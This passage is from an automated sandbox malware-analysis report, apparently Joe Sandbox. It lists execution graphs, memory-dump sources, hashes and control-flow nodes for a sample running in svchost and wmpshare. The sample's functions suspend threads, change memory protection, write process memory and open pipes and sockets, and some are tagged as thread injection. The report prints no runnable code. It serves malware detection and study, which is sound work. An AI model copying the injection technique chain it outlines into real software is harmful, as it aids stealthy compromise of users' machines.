                                                                                                                                        • Source File: 00000017.00000002.3234182550.00000155E72D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000155E72D0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_23_2_155e72d0000_svchost.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 247c94ababd4710b0196191072c8bbb5758b71c13019f7a788401a9348e82e18
                                                                                                                                        • Instruction ID: 1684949b0e2b346c4f6e13502068689c61c9b2d028cdf62c4328b71d82623ec0
                                                                                                                                        • Opcode Fuzzy Hash: 247c94ababd4710b0196191072c8bbb5758b71c13019f7a788401a9348e82e18
                                                                                                                                        • Instruction Fuzzy Hash: CFB01130E2AA00C2E3880E0AB8023A0F2B2C30B300F02B2322002F3220CA28CC08028F

                                                                                                                                        Execution Graph

                                                                                                                                        Execution Coverage:4.3%
                                                                                                                                        Dynamic/Decrypted Code Coverage:23.9%
                                                                                                                                        Signature Coverage:0%
                                                                                                                                        Total number of Nodes:306
                                                                                                                                        Total number of Limit Nodes:30
                                                                                                                                        execution_graph 33371 7df4741b3cdc 33372 7df4741b3ce9 33371->33372 33373 7df4741b3d54 33371->33373 33372->33373 33374 7df4741b3d1b SetWinEventHook 33372->33374 33374->33373 33375 28186d55918 33378 28186d56c68 33375->33378 33377 28186d5592a 33379 28186d56c71 33378->33379 33386 28186d56d54 33378->33386 33379->33386 33389 28186d63218 33379->33389 33381 28186d56d06 33381->33386 33397 28186d53c88 33381->33397 33383 28186d56d12 33384 28186d56d29 SetErrorMode 33383->33384 33385 28186d56d42 33384->33385 33388 28186d56d6c 33384->33388 33385->33386 33401 28186d569ec 33385->33401 33386->33377 33388->33377 33394 28186d63265 33389->33394 33390 28186d642a6 33390->33381 33391 28186d63d5a RtlFormatCurrentUserKeyPath 33392 28186d63d66 33391->33392 33392->33390 33393 28186d63eab calloc 33392->33393 33393->33390 33395 28186d63ed1 33393->33395 33394->33390 33394->33391 33394->33392 33395->33390 33417 28186d5563c 6 API calls 33395->33417 33398 28186d53c95 33397->33398 33399 28186d53cbb 33397->33399 33398->33399 33400 28186d53c9b RtlAddFunctionTable 33398->33400 33399->33383 33400->33399 33402 28186d569f5 33401->33402 33404 28186d56a68 33401->33404 33403 28186d56acd 33402->33403 33406 28186d56a21 33402->33406 33441 28186d6105c 16 API calls 33403->33441 33404->33386 33406->33404 33407 28186d56a3d 33406->33407 33408 28186d56a99 33406->33408 33409 28186d56a42 33407->33409 33410 28186d56a8c 33407->33410 33440 28186d616c8 13 API calls 33408->33440 33413 28186d56a77 33409->33413 33414 28186d56a47 33409->33414 33439 28186d61188 16 API calls 33410->33439 33438 28186d612bc 18 API calls 33413->33438 33414->33404 33418 28186d5d7c0 33414->33418 33417->33390 33419 28186d5d7e0 33418->33419 33420 28186d5d85f CloseHandle 33419->33420 33421 28186d5d7fb MapViewOfFile 33419->33421 33422 28186d5d871 33420->33422 33423 28186d5d92b 33420->33423 33428 28186d5d825 33421->33428 33422->33423 33442 28186d52b54 33422->33442 33463 28186d5a9d4 33423->33463 33427 28186d5d881 33427->33423 33446 28186d5e2a8 33427->33446 33428->33420 33432 28186d5d893 33455 28186d5d3b4 6 API calls 33432->33455 33434 28186d5d898 33456 28186d579a0 33434->33456 33436 28186d5d8e7 33462 28186d52ba8 6 API calls 33436->33462 33438->33404 33439->33404 33440->33404 33441->33404 33443 28186d52b64 33442->33443 33444 28186d52b6d HeapCreate 33443->33444 33445 28186d52b86 33443->33445 33444->33445 33445->33427 33447 28186d5e2c0 33446->33447 33448 28186d5e30a 33447->33448 33468 28186d52c24 33447->33468 33449 28186d5e317 VirtualProtect 33448->33449 33450 28186d5d88e 33448->33450 33472 28186d51000 33449->33472 33454 28186d5e1dc GetSystemInfo VirtualAlloc 33450->33454 33453 28186d5e344 VirtualProtect 33453->33450 33454->33432 33455->33434 33459 28186d579ce 33456->33459 33457 28186d57c40 33457->33436 33458 28186d5a9d4 2 API calls 33458->33457 33459->33457 33461 28186d57b8e 33459->33461 33481 28186d577dc 33459->33481 33461->33458 33462->33423 33464 28186d5a9e7 free 33463->33464 33465 28186d5a9f8 33463->33465 33464->33464 33464->33465 33466 28186d5aa17 33465->33466 33467 28186d5aa02 free 33465->33467 33466->33404 33467->33466 33467->33467 33469 28186d52c52 33468->33469 33471 28186d52cbc 33469->33471 33474 28186d524c4 33469->33474 33471->33448 33473 28186d5100c 33472->33473 33473->33453 33477 28186d522d4 GetSystemInfo 33474->33477 33478 28186d52305 33477->33478 33479 28186d523a4 VirtualAlloc 33478->33479 33480 28186d523cf 33478->33480 33479->33478 33479->33480 33480->33471 33482 28186d57804 33481->33482 33489 28186d63158 33482->33489 33484 28186d5782d 33486 28186d57879 33484->33486 33493 28186d62ec8 33484->33493 33487 28186d578bb GetVolumeInformationW 33486->33487 33488 28186d5790c 33486->33488 33487->33488 33488->33461 33490 28186d6317b 33489->33490 33492 28186d63173 33489->33492 33491 28186d631dc NtAcceptConnectPort 33490->33491 33490->33492 33491->33492 33492->33484 33494 28186d62f11 33493->33494 33495 28186d62f67 NtAcceptConnectPort 33494->33495 33496 28186d62f1b 33494->33496 33495->33496 33496->33486 33497 28186d569b8 33498 28186d569d4 33497->33498 33499 28186d569e2 33498->33499 33500 28186d569d9 GetProcAddressForCaller 33498->33500 33500->33499 33501 28186d52978 33502 28186d529a6 VirtualProtect 33501->33502 33503 28186d5299e 33501->33503 33504 28186d529c1 33502->33504 33505 28186d529cb 33502->33505 33503->33502 33506 28186d52a0d VirtualProtect 33505->33506 33506->33504 33507 7df4741e47b8 33508 7df4741e47ee 33507->33508 33509 7df4741e4b08 33508->33509 33519 7df4741e1708 33508->33519 33513 7df4741e4909 calloc 33516 7df4741e482b 33513->33516 33518 7df4741e4a12 33513->33518 33514 7df4741e4958 33515 7df4741e49e3 SendMessageA 33514->33515 33515->33518 33516->33509 33516->33513 33516->33514 33528 7df4741e2730 NtQuerySystemInformation NtQuerySystemInformation 33518->33528 33520 7df4741e173b 33519->33520 33521 7df4741e1715 33519->33521 33523 7df4741e1740 33520->33523 33521->33520 33522 7df4741e171b RtlAddFunctionTable 33521->33522 33522->33520 33524 7df4741e1760 VirtualProtect 33523->33524 33526 7df4741e176f 33523->33526 33524->33526 33525 7df4741e180d 33525->33516 33526->33525 33527 7df4741e17e9 VirtualProtect 33526->33527 33527->33526 33529 28186d684c0 SetErrorMode 33530 28186d684d4 33529->33530 33531 28186d6b936 socket 33530->33531 33532 28186d6b9c3 socket 33531->33532 33533 28186d6b97a getsockopt 33531->33533 33535 28186d6b9e3 33532->33535 33533->33532 33536 28186d5cee0 33537 28186d5cef3 33536->33537 33541 28186d5cf49 33536->33541 33542 28186d5a7e0 33537->33542 33539 28186d5cf05 33540 28186d5cf28 ReadFile 33539->33540 33540->33541 33543 28186d5a800 33542->33543 33545 28186d5a847 33542->33545 33544 28186d5a86b malloc 33543->33544 33543->33545 33544->33545 33545->33539 33546 28186d62d80 33547 28186d62d9f 33546->33547 33548 28186d62d90 NtAcceptConnectPort 33546->33548 33548->33547 33549 7df4741e25d4 NtQuerySystemInformation 33550 7df4741e25f7 33549->33550 33551 7df4741e2613 NtQuerySystemInformation 33550->33551 33552 7df4741e262f 33550->33552 33551->33552 33553 28186d5cc9c 33554 28186d5ccba 33553->33554 33567 28186d5cd34 33553->33567 33555 28186d5ce5f 33554->33555 33556 28186d5cce0 33554->33556 33554->33567 33558 28186d5a7e0 malloc 33555->33558 33557 28186d5ce2e 33556->33557 33561 28186d5ccf7 33556->33561 33559 28186d5a7e0 malloc 33557->33559 33560 28186d5ce42 33558->33560 33559->33560 33562 28186d5ce93 ReadFile 33560->33562 33563 28186d5cded 33561->33563 33564 28186d5cd2b 33561->33564 33561->33567 33562->33567 33582 28186d5bc64 33563->33582 33564->33567 33568 28186d5c994 33564->33568 33569 28186d5cc66 33568->33569 33570 28186d5c9ce 33568->33570 33569->33567 33570->33569 33571 28186d5ca12 calloc 33570->33571 33575 28186d5cbd5 33571->33575 33581 28186d5ca2d 33571->33581 33572 28186d5cc4f 33573 28186d5a9d4 2 API calls 33572->33573 33573->33569 33574 28186d5cbca free 33574->33575 33575->33572 33596 28186d5c2d0 33575->33596 33577 28186d5cbc2 33600 28186d6e398 free free 33577->33600 33581->33574 33581->33577 33589 28186d6e7e8 free free 33581->33589 33590 28186d6dbcc 33581->33590 33583 28186d5bc92 33582->33583 33584 28186d5bd60 33582->33584 33583->33584 33585 28186d5bcb5 OpenFileMappingW 33583->33585 33584->33567 33585->33584 33586 28186d5bcd2 MapViewOfFile 33585->33586 33587 28186d5bd57 CloseHandle 33586->33587 33588 28186d5bcf0 33586->33588 33587->33584 33588->33587 33589->33581 33591 28186d6dbe5 33590->33591 33594 28186d6dbde 33590->33594 33592 28186d6dc24 33591->33592 33593 28186d6dc1e free 33591->33593 33591->33594 33592->33594 33601 28186d94c3c 33592->33601 33593->33592 33594->33581 33597 28186d5c313 33596->33597 33599 28186d5c87a 33596->33599 33598 28186d5c7c0 VirtualAlloc 33597->33598 33597->33599 33598->33599 33599->33572 33600->33574 33602 28186d94c4a 33601->33602 33603 28186d94c6c 33601->33603 33602->33603 33604 28186d94c65 free 33602->33604 33603->33594 33604->33603 33605 28186d5515c 33618 28186d62a20 33605->33618 33607 28186d55374 33608 28186d55367 33630 28186d6290c 33608->33630 33609 28186d551b5 33609->33607 33609->33608 33621 28186d62dac 33609->33621 33614 28186d552f2 33627 28186d62ddc 33614->33627 33617 28186d62dac NtAcceptConnectPort 33617->33614 33619 28186d62a30 NtAcceptConnectPort 33618->33619 33620 28186d62a45 33618->33620 33619->33620 33620->33609 33622 28186d55244 33621->33622 33623 28186d62dbc NtAcceptConnectPort 33621->33623 33622->33608 33624 28186d62cac 33622->33624 33623->33622 33625 28186d55290 33624->33625 33626 28186d62cbf NtAcceptConnectPort 33624->33626 33625->33614 33625->33617 33626->33625 33628 28186d62df0 33627->33628 33629 28186d62dec NtAcceptConnectPort 33627->33629 33628->33608 33629->33628 33631 28186d62920 33630->33631 33632 28186d6291c NtAcceptConnectPort 33630->33632 33631->33607 33632->33631 33633 7df4741b8c38 SetErrorMode 33634 7df4741b8c4c 33633->33634 33635 7df4741bc8f2 socket 33634->33635 33636 7df4741bc981 33635->33636 33637 7df4741bc936 closesocket 33635->33637 33639 7df4741bc987 socket 33636->33639 33637->33639 33640 7df4741bc99f 33639->33640 33641 28186d5bc28 33642 28186d5bc2d 33641->33642 33644 28186d5bc56 33641->33644 33645 28186d5ba4c 33642->33645 33646 28186d5ba6d 33645->33646 33647 28186d5bb44 CreateWindowExW 33646->33647 33648 28186d5bba1 33646->33648 33647->33648 33648->33644 33649 28186d52908 33650 28186d5295b 33649->33650 33651 28186d5291a 33649->33651 33651->33650 33652 28186d5293d ResumeThread 33651->33652 33652->33651 33653 28186d5d004 33654 28186d5d057 33653->33654 33661 28186d5aef0 33654->33661 33656 28186d5d07f CreateNamedPipeW 33657 28186d5d0c7 33656->33657 33659 28186d5d109 33656->33659 33658 28186d5d0e0 BindIoCompletionCallback 33657->33658 33658->33659 33660 28186d5d0f8 ConnectNamedPipe 33658->33660 33660->33659 33662 28186d5af2c 33661->33662 33665 28186d62e84 33662->33665 33664 28186d5af34 33664->33656 33666 28186d62e98 NtAcceptConnectPort 33665->33666 33667 28186d62eb2 33665->33667 33666->33667 33667->33664 33668 7df4741b3cb0 33669 7df4741b3cc7 33668->33669 33672 7df4741b2f48 33669->33672 33671 7df4741b3cd5 33674 7df4741b2f6a 33672->33674 33675 7df4741b2f87 33674->33675 33676 7df4741b2e90 NtQuerySystemInformation 33674->33676 33675->33671 33677 7df4741b2eb3 33676->33677 33678 7df4741b2ecf NtQuerySystemInformation 33677->33678 33679 7df4741b2eeb 33677->33679 33678->33679 33679->33675 33680 7df4741b4290 33682 7df4741b42c3 33680->33682 33681 7df4741b44c0 33682->33681 33690 7df4741b1708 33682->33690 33686 7df4741b42fe 33686->33681 33687 7df4741b4453 33686->33687 33689 7df4741b43f0 calloc 33686->33689 33688 7df4741b449b SendMessageA 33687->33688 33688->33681 33689->33686 33691 7df4741b1715 33690->33691 33692 7df4741b173b 33690->33692 33691->33692 33693 7df4741b171b RtlAddFunctionTable 33691->33693 33694 7df4741b1740 33692->33694 33693->33692 33695 7df4741b1760 VirtualProtect 33694->33695 33697 7df4741b176f 33694->33697 33695->33697 33696 7df4741b180d 33696->33686 33697->33696 33698 7df4741b17e9 VirtualProtect 33697->33698 33698->33697 33699 7df4742022cc 33701 7df4742022ee 33699->33701 33700 7df47420276d 33701->33700 33707 7df474201290 33701->33707 33705 7df474202754 SetTimer 33705->33700 33706 7df474202329 33706->33700 33706->33705 33708 7df4742012c3 33707->33708 33709 7df47420129d 33707->33709 33711 7df4742012c8 33708->33711 33709->33708 33710 7df4742012a3 RtlAddFunctionTable 33709->33710 33710->33708 33712 7df4742012e8 VirtualProtect 33711->33712 33714 7df4742012f7 33711->33714 33712->33714 33713 7df474201395 33713->33706 33714->33713 33715 7df474201371 VirtualProtect 33714->33715 33715->33714 33720 28186d5bef0 33721 28186d5bf19 33720->33721 33722 28186d5bf47 LoadLibraryA 33721->33722 33723 28186d5bf29 33721->33723 33722->33723 33724 28186d574f0 33727 28186d57528 33724->33727 33725 28186d575c3 VirtualFree 33725->33727 33726 28186d57782 33727->33725 33727->33726 33728 28186d5262c 33730 28186d5265f 33728->33730 33729 28186d5288e 33731 28186d52680 Thread32First 33730->33731 33735 28186d52738 33730->33735 33732 28186d52685 33731->33732 33734 28186d5272f CloseHandle 33732->33734 33733 28186d52771 SuspendThread 33733->33735 33734->33735 33735->33729 33735->33733 33736 28186d5698c 33737 28186d569a6 33736->33737 33738 28186d569b0 33737->33738 33739 28186d569ab LoadLibraryA 33737->33739 33739->33738

                                                                                                                                        Executed Functions

                                                                                                                                        Function 00007DF474201958 Relevance: 24.8, APIs: 12, Strings: 2, Instructions: 337nativememoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000022.00000003.3152628101.00007DF474201000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF474201000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_34_3_7df474201000_wmpshare.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MemoryVirtual$Read$Protect$Write$AllocateInformationProcessQuerycalloc
                                                                                                                                        • String ID: H$H
                                                                                                                                        • API String ID: 874015164-136785262
                                                                                                                                        • Opcode ID: 8b723a4ddad616be20f9dda8abf44bc9042e1d61a48c0cd72079f3722cd3507a
                                                                                                                                        • Instruction ID: 0a41a7f9949bc9dd17731c4a86d1ff978b6881a268e9259142fdd07782a9459e
                                                                                                                                        • Opcode Fuzzy Hash: 8b723a4ddad616be20f9dda8abf44bc9042e1d61a48c0cd72079f3722cd3507a
                                                                                                                                        • Instruction Fuzzy Hash: A4B1447060CB888FD754DF18D845AAAB7E5FFD4340F000A2EE5CAC3261EB39E5558B86
                                                                                                                                        Function 0000028186D63218 Relevance: 17.0, APIs: 2, Strings: 7, Instructions: 1263COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 0 28186d63218-28186d63274 call 28186d549e4 3 28186d642bb-28186d642e1 call 28186d649f0 0->3 4 28186d6327a-28186d632db call 28186d56dfc * 3 call 28186d532fc call 28186d56dfc 0->4 18 28186d642a8-28186d642a9 4->18 19 28186d632e1-28186d63bf4 4->19 22 28186d642ad-28186d642b6 call 28186d54a40 18->22 20 28186d63d49-28186d63d51 19->20 21 28186d63bfa-28186d63c05 19->21 23 28186d63d53-28186d63d58 20->23 24 28186d63dc4-28186d63dd5 20->24 21->20 25 28186d63c0b-28186d63c19 21->25 22->3 23->24 29 28186d63d5a-28186d63d64 RtlFormatCurrentUserKeyPath 23->29 27 28186d63dd7-28186d63def 24->27 28 28186d63e2e-28186d63e34 24->28 30 28186d63d44-28186d63d45 25->30 31 28186d63c1f-28186d63c27 25->31 27->28 43 28186d63df1-28186d63df9 27->43 34 28186d63e36-28186d63e37 28->34 35 28186d63e5f-28186d63e72 28->35 29->24 33 28186d63d66-28186d63d77 29->33 30->20 31->30 36 28186d63c2d-28186d63c45 31->36 38 28186d63d92-28186d63d9a 33->38 39 28186d63d79-28186d63d85 33->39 40 28186d63e39-28186d63e58 34->40 35->18 54 28186d63e78-28186d63e83 35->54 41 28186d63d38-28186d63d3c 36->41 42 28186d63c4b-28186d63c4c 36->42 44 28186d63d9c-28186d63db8 call 28186d51000 38->44 56 28186d63d87-28186d63d90 39->56 57 28186d63dbb-28186d63dbc 39->57 40->40 45 28186d63e5a-28186d63e5b 40->45 48 28186d63d3e-28186d63d3f 41->48 46 28186d63c4f-28186d63c5f 42->46 49 28186d63e0b 43->49 50 28186d63dfb-28186d63e09 43->50 44->57 45->35 53 28186d63c71-28186d63c73 46->53 48->30 49->28 55 28186d63e0d-28186d63e28 49->55 50->28 59 28186d63c75-28186d63c7a 53->59 60 28186d63c61-28186d63c6f 53->60 54->18 61 28186d63e89-28186d63e97 54->61 55->28 56->44 57->24 63 28186d63d05-28186d63d08 59->63 64 28186d63c80 59->64 60->53 61->18 62 28186d63e9d-28186d63ea5 61->62 62->18 65 28186d63eab-28186d63ecb calloc 62->65 66 28186d63d15-28186d63d24 63->66 67 28186d63d0a-28186d63d0e 63->67 68 28186d63c82-28186d63c89 64->68 65->18 71 28186d63ed1-28186d63ef5 65->71 66->46 73 28186d63d2a-28186d63d36 66->73 67->66 72 28186d63d10-28186d63d11 67->72 69 28186d63ca3-28186d63ccf 68->69 70 28186d63c8b-28186d63c9f 68->70 75 28186d63cf7-28186d63cf8 69->75 76 28186d63cd1-28186d63ce5 call 28186d64a1c 69->76 70->68 74 28186d63ca1 70->74 77 28186d64014-28186d6404f 71->77 78 28186d63efb-28186d63f0e 71->78 72->66 73->48 74->63 81 28186d63cfd-28186d63cfe 75->81 76->75 86 28186d63ce7-28186d63cf5 76->86 89 28186d640a7-28186d640b7 77->89 90 28186d64051-28186d64052 77->90 80 28186d63f10-28186d63f1a 78->80 83 28186d63fe5-28186d63ff7 80->83 84 28186d63f20-28186d63f24 80->84 81->63 83->80 87 28186d63ffd-28186d64012 83->87 84->83 88 28186d63f2a-28186d63f74 call 28186d64a30 84->88 86->81 87->77 99 28186d63f88-28186d63f8a 88->99 89->18 98 28186d640bd-28186d640d3 89->98 92 28186d64054-28186d6405c 90->92 95 28186d6405e-28186d64063 92->95 96 28186d64089-28186d6409d 92->96 95->96 100 28186d64065-28186d6406e 95->100 96->92 97 28186d6409f-28186d640a0 96->97 97->89 101 28186d640d5-28186d640d6 98->101 102 28186d64149-28186d6414f 98->102 103 28186d63f76-28186d63f86 99->103 104 28186d63f8c-28186d63fa2 99->104 105 28186d64071-28186d64074 100->105 108 28186d640d8-28186d640e3 101->108 106 28186d64151-28186d64155 102->106 107 28186d641a2-28186d641a9 102->107 103->99 109 28186d63fa4-28186d63fac 104->109 110 28186d63fe1 104->110 111 28186d64076 105->111 112 28186d6407d-28186d64087 105->112 113 28186d6415c-28186d64167 106->113 116 28186d64256-28186d64258 107->116 117 28186d641af-28186d641cf call 28186d532fc 107->117 114 28186d640e5-28186d640f2 108->114 115 28186d640f4-28186d64108 108->115 109->110 118 28186d63fae 109->118 110->83 111->112 112->96 112->105 121 28186d64189-28186d641a0 113->121 122 28186d64169-28186d64175 113->122 114->115 135 28186d6410c-28186d6411b 114->135 115->102 123 28186d6410a 115->123 119 28186d64284-28186d6428d 116->119 120 28186d6425a-28186d64264 116->120 136 28186d641e4-28186d641f8 call 28186d532fc 117->136 137 28186d641d1-28186d641e2 call 28186d535b8 117->137 125 28186d63fb0-28186d63fc9 call 28186d64a1c 118->125 119->22 127 28186d6428f-28186d642a6 call 28186d56e0c call 28186d5563c 119->127 120->119 126 28186d64266-28186d64280 120->126 121->107 121->113 122->121 128 28186d64177-28186d6417e 122->128 123->108 139 28186d63fd5-28186d63fdb 125->139 140 28186d63fcb-28186d63fd1 125->140 126->119 127->22 128->121 134 28186d64180-28186d64187 128->134 134->121 143 28186d6411d-28186d6413a 135->143 144 28186d6413c 135->144 136->116 152 28186d641fa-28186d6420b call 28186d535b8 136->152 137->136 151 28186d6420d-28186d64223 call 28186d62804 137->151 139->110 140->125 146 28186d63fd3 140->146 147 28186d64141-28186d64143 143->147 144->147 146->110 147->102 147->119 151->116 158 28186d64225-28186d64235 151->158 152->116 152->151 158->116 160 28186d64237-28186d64250 158->160 160->116
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000022.00000002.3432219356.0000028186D51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000028186D51000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_34_2_28186d51000_wmpshare.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CurrentFormatPathUsercalloc
                                                                                                                                        • String ID: ;$dW$;$dW$MZ$MZ$N$t$;Ln
                                                                                                                                        • API String ID: 4207655178-84560671
                                                                                                                                        • Opcode ID: 144bb87cf5323e5ca5c5509969d93574830f0e274aa410f43bce18622ad8fb25
                                                                                                                                        • Instruction ID: 57b04a3dc2b0aca28fb89c5c425c278f7d16bcc8cff0574d8bbf3325ad02fbe9
                                                                                                                                        • Opcode Fuzzy Hash: 144bb87cf5323e5ca5c5509969d93574830f0e274aa410f43bce18622ad8fb25
                                                                                                                                        • Instruction Fuzzy Hash: 3BA28D7451CB888FE375DF1888897AAB7E4FB99701F504A2ED4CAC3292DB709551CF82
                                                                                                                                        Function 00007DF474201CE8 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 296processnativethreadCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000022.00000003.3152628101.00007DF474201000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF474201000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_34_3_7df474201000_wmpshare.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Close$CreateFunctionHandleInformationOpenProcessProtectQueryResumeTableThreadValueVirtualVolumefree
                                                                                                                                        • String ID: -
                                                                                                                                        • API String ID: 3434737372-2547889144
                                                                                                                                        • Opcode ID: 105c85825427e7c8ed203293b96c467a96f9bba36c05be2648f83f100e5bc7da
                                                                                                                                        • Instruction ID: 75f61ce4541e104b62f20035d22509b573a97589c99f0c3894a54d943e59e1ae
                                                                                                                                        • Opcode Fuzzy Hash: 105c85825427e7c8ed203293b96c467a96f9bba36c05be2648f83f100e5bc7da
                                                                                                                                        • Instruction Fuzzy Hash: 94919430708A498BEB55EB64D89967B73E1FF94341F00492AE58BC21B1EF7EE91187C1
                                                                                                                                        Function 00000281871B1F40 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 426memoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000022.00000003.3152773361.00000281871B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000281871A0000, based on PE: true
                                                                                                                                        • Associated: 00000022.00000003.3131713236.00000281871A0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000022.00000003.3132014270.00000281871A0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_34_3_281871a0000_wmpshare.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Free$HeapVirtual
                                                                                                                                        • String ID: c
                                                                                                                                        • API String ID: 3783212868-112844655
                                                                                                                                        • Opcode ID: 77fcb0899b579933234bf28a389ebff450214e9b54b7d72481cbef379a7dcc1d
                                                                                                                                        • Instruction ID: d9fdd340d1771189026eb1df890250c8abcb7fc61931c9b6803529e0421e82cb
                                                                                                                                        • Opcode Fuzzy Hash: 77fcb0899b579933234bf28a389ebff450214e9b54b7d72481cbef379a7dcc1d
                                                                                                                                        • Instruction Fuzzy Hash: F80276776056A086E7B48F28D04977E7BE5F788784F84C412DB9A83B84DF38C99AC740
                                                                                                                                        Function 0000028186D5D004 Relevance: 4.6, APIs: 3, Instructions: 110pipeCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000022.00000002.3432219356.0000028186D51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000028186D51000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_34_2_28186d51000_wmpshare.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: NamedPipe$BindCallbackCompletionConnectCreate
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2502124517-0
                                                                                                                                        • Opcode ID: b1072abd5d2d87ebe3607f0745b4a817757572de37e54cefdeb42629dd895e39
                                                                                                                                        • Instruction ID: 436e1a9fb085963b3ec8a660f85f530f28650c9c6dc69e7359142acd90123a8b
                                                                                                                                        • Opcode Fuzzy Hash: b1072abd5d2d87ebe3607f0745b4a817757572de37e54cefdeb42629dd895e39
                                                                                                                                        • Instruction Fuzzy Hash: 48317C30208A088FEB95EF28D89DB9A77E9FB94310F504729E49BC21D1DF34C955CB81
                                                                                                                                        Function 0000028186D63158 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 81COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 280 28186d63158-28186d63171 281 28186d63173-28186d63176 280->281 282 28186d6317b-28186d6317e 280->282 283 28186d6320e-28186d63216 281->283 284 28186d63180-28186d63185 282->284 285 28186d6318a-28186d6319f 282->285 284->283 286 28186d631a1-28186d631a5 285->286 287 28186d631ab-28186d631da 285->287 286->287 288 28186d631dc-28186d631e8 NtAcceptConnectPort 287->288 289 28186d631ea 287->289 290 28186d631ef-28186d631f1 288->290 289->290 291 28186d631f3-28186d631fd 290->291 292 28186d6320c 290->292 293 28186d63205 291->293 294 28186d631ff-28186d63203 291->294 292->283 295 28186d6320a 293->295 294->295 295->292
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000022.00000002.3432219356.0000028186D51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000028186D51000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_34_2_28186d51000_wmpshare.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: 0
                                                                                                                                        • API String ID: 0-4108050209
                                                                                                                                        • Opcode ID: c5b43eddf7a139210649571aee53adea5981a484dd6b9365d0c1e8096d80dd49
                                                                                                                                        • Instruction ID: 0d9c3eed2c82739174b93b8469d9a4fd526240a9c8b17225b5e001be968ce0cb
                                                                                                                                        • Opcode Fuzzy Hash: c5b43eddf7a139210649571aee53adea5981a484dd6b9365d0c1e8096d80dd49
                                                                                                                                        • Instruction Fuzzy Hash: 6D2135327099484FF7609E9888CD32936E4E39D301F51563EE589C3290DB29CD498B82
                                                                                                                                        Function 0000028186D5262C Relevance: 3.3, APIs: 2, Instructions: 293threadinjectionCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 383 28186d5262c-28186d52666 call 28186d9342c 386 28186d52738-28186d5273b 383->386 387 28186d5266c-28186d52680 call 28186d93426 Thread32First 383->387 388 28186d52741-28186d52749 386->388 389 28186d5288e-28186d528a1 386->389 394 28186d52685-28186d5268a 387->394 388->389 391 28186d5274f-28186d52750 388->391 393 28186d52752-28186d5276b 391->393 401 28186d52771-28186d52788 SuspendThread 393->401 402 28186d5287e-28186d52888 393->402 395 28186d52716-28186d52722 call 28186d93420 394->395 396 28186d52690-28186d5269a 394->396 400 28186d52727-28186d52729 395->400 396->395 403 28186d5269c-28186d526a6 396->403 400->394 404 28186d5272f-28186d52732 CloseHandle 400->404 405 28186d52796-28186d52798 401->405 402->389 402->393 403->395 409 28186d526a8-28186d526ae 403->409 404->386 407 28186d52873-28186d5287c 405->407 408 28186d5279e-28186d527a2 405->408 407->402 410 28186d527a4-28186d527ae 408->410 411 28186d527b0-28186d527b1 408->411 414 28186d526d6-28186d526dc 409->414 415 28186d526b0-28186d526d2 409->415 412 28186d527b4-28186d527b6 410->412 411->412 412->407 416 28186d527bc-28186d527d2 412->416 417 28186d52705-28186d52712 414->417 418 28186d526de-28186d526f8 414->418 415->404 423 28186d526d4 415->423 419 28186d527d4-28186d527e5 416->419 417->395 418->404 428 28186d526fa-28186d52702 418->428 421 28186d527e7-28186d527ea 419->421 422 28186d527fe 419->422 425 28186d527f7-28186d527fc 421->425 426 28186d527ec-28186d527f5 421->426 427 28186d52800-28186d5280a 422->427 423->417 425->427 426->427 429 28186d52862-28186d5286a 427->429 430 28186d5280c-28186d5280e 427->430 428->417 429->419 431 28186d52870-28186d52871 429->431 432 28186d52814-28186d52821 